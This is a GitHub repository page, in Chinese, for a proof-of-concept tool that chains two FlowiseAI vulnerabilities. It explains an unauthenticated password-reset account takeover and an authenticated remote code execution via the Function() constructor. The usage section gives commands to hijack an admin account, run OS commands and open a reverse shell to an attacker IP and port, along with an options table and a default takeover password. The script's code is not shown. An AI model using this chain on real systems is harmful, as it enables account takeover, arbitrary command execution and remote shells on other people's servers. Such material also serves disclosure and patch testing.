TYehan/CVE-2025-58434-59528
GitHub: TYehan/CVE-2025-58434-59528
针对 FlowiseAI 的未认证账户接管与已认证 RCE 漏洞链 POC 工具。
Stars: 2 | Forks: 0
# CVE-2025-58434 + CVE-2025-59528
## 漏洞
### CVE-2025-58434 — 未认证账户接管
忘记密码端点在未进行身份验证的情况下返回有效的密码重置令牌。攻击者只需知晓有效邮箱地址即可在无需用户交互的情况下重置任意账户的密码。
### CVE-2025-59528 — 已认证远程代码执行
CustomMCP 节点将用户控制的输入直接传递给带有完整 Node.js 权限的 `Function()` 构造函数。拥有有效 API 键的已认证用户可以以 Flowise 进程用户的身份执行任意操作系统命令。
**修复版本:** Flowise 3.0.6
## 要求
- Python 3.8+
- `pip install requests`
## 用法
### 完整的 ATO 链
重置密码、提示输入 API 键,然后触发反向 shell。
```
python3 flowise_chain.py -t http://target -e admin@target.com
```
### 仅 RCE
如果你已有有效的 API 键,请使用此选项。
```
python3 flowise_chain.py -t http://target --api-key -c "id"
```
### 使用已有密钥的反向 shell
```
python3 flowise_chain.py -t http://target --api-key --lhost 10.0.0.1 --lport 4444
```
### 选项
| 标志 | 描述 |
|------|-------------|
| `-t`, `--target` | 目标 URL |
| `-e`, `--email` | 目标账户邮箱(触发 ATO 链) |
| `--api-key` | 直接提供 API 键(跳过 ATO) |
| `-c`, `--command` | 要执行的命令 |
| `--lhost` | 反向 shell 的攻击者 IP |
| `--lport` | 反向 shell 的攻击者端口(默认:4444) |
| `--new-password` | 重置时设置的密码(默认:`Pwn3d!2026`) |
| `-k`, `--insecure` | 跳过 TLS 验证 |
## 备注
## 作者
## 免责声明
标签:API 密钥, APT, ATT&CK T1059, ATT&CK T1078, CVE, FlowiseAI, Function 构造函数, GNU通用公共许可证, Node.js, PoC, RCE, 反向Shell, 命令执行, 密码重置令牌, 数字签名, 暴力破解, 未认证账户接管, 漏洞链, 编程工具, 认证后远程代码执行, 远程代码执行, 逆向工具